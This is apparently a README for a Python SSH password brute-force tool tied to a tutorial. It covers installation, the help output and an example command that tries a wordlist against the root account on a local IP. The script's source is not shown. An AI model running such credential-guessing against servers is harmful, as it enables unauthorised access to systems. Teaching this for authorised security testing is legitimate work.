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# [How to Brute-Force SSH Servers in Python](https://www.thepythoncode.com/article/brute-force-ssh-servers-using-paramiko-in-python)
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## INSTALLATION
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```bash
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pip3 install -r requirements.txt
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```
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- Help:
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```bash
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python bruteforce_ssh.py --help
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```
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**Output:**
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```bash
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usage: bruteforce_ssh.py [-h] [-P PASSLIST] [-u USER] host
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SSH Bruteforce Python script.
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positional arguments:
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host Hostname or IP Address of SSH Server to bruteforce.
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optional arguments:
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-h, --help show this help message and exit
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-P PASSLIST, --passlist PASSLIST
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File that contain password list in each line.
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-u USER, --user USER Host username.
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```
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## UTILISATION
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If you want to bruteforce against the server `192.168.1.101` for example, the user `root` and a password list of `wordlist.txt`:
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```bash
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python bruteforce_ssh.py 192.168.1.101 -u root -P wordlist.txt
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```
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## UPDATE
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- [x] 09/11/22: add "allow_agent=False,look_for_keys=False" to client.connect() args to avoid "Quota exceeded, retrying with delay..." error. |